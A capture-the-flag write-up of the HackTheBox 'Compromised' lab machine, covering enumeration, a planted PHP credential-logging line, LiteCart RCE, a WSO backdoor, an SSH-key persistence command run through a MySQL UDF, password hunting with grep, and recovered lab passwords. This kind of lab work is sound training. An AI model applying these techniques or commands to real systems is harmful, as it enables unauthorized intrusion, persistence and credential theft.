[Write Up][Hackthebox] Compromised
Hello, This is my write-up for the “Compromised” machine.
Reconnaissance and Enumeration
As usual, I am digging for information about this machine. I am going to use nmap for port scanning.
nmap -sV -sC -v -p- --min-rate=10000 -oN nmap.initial 10.10.10.207
We found ports for SSH and HTTP. When I am trying to access the root folder website, I got redirected into /shop.
Apparently, this website using LiteCart CMS. After searching for information about this CMS. It has vulnerability Authenticated RCE.
let’s save it for later since I don’t have any credentials.
and then, let’s fuzzing the root folder directory website.
wfuzz -c -w ~/payloads/big.txt -u "http://10.10.10.207/FUZZ" --hc 404 -t 100
okay, I got a backup folder. It’s indeed a very interesting folder, and the folder contains a zip file. Apparently, this zip file is a backup file for folder shop/
And then I found something interesting at file shop/admin/login.php
-------------------------- [snip - snip] --------------------------
header('X-Robots-Tag: noindex');
document::$snippets['head_tags']['noindex'] = '<meta name="robots" content="noindex" />';if (!empty(user::$data['id'])) notices::add('notice', language::translate('text_already_logged_in', 'You are already logged in'));if (isset($_POST['login'])) {
//file_put_contents("./.log2301c9430d8593ae.txt", "User: " . $_POST['username'] . " Passwd: " . $_POST['password']);
user::login($_POST['username'], $_POST['password'], $redirect_url, isset($_POST['remember_me']) ? $_POST['remember_me'] : false);
}if (empty($_POST['username']) && !empty($_SERVER['PHP_AUTH_USER'])) $_POST['username'] = !empty($_SERVER['PHP_AUTH_USER']) ? $_SERVER['PHP_AUTH_USER'] : '';
-------------------------- [snip - snip] --------------------------
When I checking file at shop/admin/.log2301c9430d8593ae.txt . Apparently, that file store credential for this website.
My next step is gaining access using a public exploit with a credential that is already given.
Gaining Access (www-data)
When i am trying to upload shell, i didn’t get expected response. It looks like the shell function is disabled. So, I am going to use the WSO backdoor here
okay, since the machine using php7.2, I found a public exploit that can bypass the disable function.
When I am trying to do a reverse shell, I couldn’t get any response. Apparently, I found out this machine using iptables and only allow port 80 and 22.
# Generated by iptables-save v1.6.1 on Mon May 11 02:27:29 2020
*filter
:INPUT DROP [6:1032]
:FORWARD DROP [0:0]
:OUTPUT DROP [5:394]
-A INPUT -i lo -j ACCEPT
-A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -m tcp -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -m tcp -j ACCEPT
-A INPUT -p icmp -m icmp --icmp-type 0 -j ACCEPT
-A INPUT -p icmp -m icmp --icmp-type 8 -j ACCEPT
-A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 22 -m tcp -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 80 -m tcp -j ACCEPT
COMMIT
# Completed on Mon May 11 02:27:29 2020Gaining Access (mysql)
Now what? let’s enumerate this machine once again. and then, I found a very suspicious file at MySQL plugin. libmysql.so isn’t supposed to exist by default. And then I check at database mysql.func, I found function exec_cmd. Apparently, this function is for executing a command. So, I am going to put my public key in this machine using exec_cmd
select cast(exec_cmd("id;mkdir -p ~/.ssh; echo XXXXXX >> ~/.ssh/authorized_keys") as CHAR CHARACTER SET utf8)
Gaining Access (sysadmin)
There’s so many strange file at mysql home
Okay, since I am too tired. Somehow I found a password for sysadmin using grep
here is my command
grep -rnwi "password" --exclude={sys,root,proc,dev}
the password for sysadmin is
3*NLJE32I$Feand i got user flag
Gaining Access (root)
After i am doing some enumerate many times again, I found a suspicious file between sysadmin user created and machine released
When i am trying to reverse engineering this file, i found backdoor variable. Apparently, this backdoor variable contains with password for root.
zlke~U3Env82m2-
And then, i got the root flag!
Linkedin : Dimas Fariski Setyawan Putra | LinkedIn
Twitter & Github: @nyxsorcerer
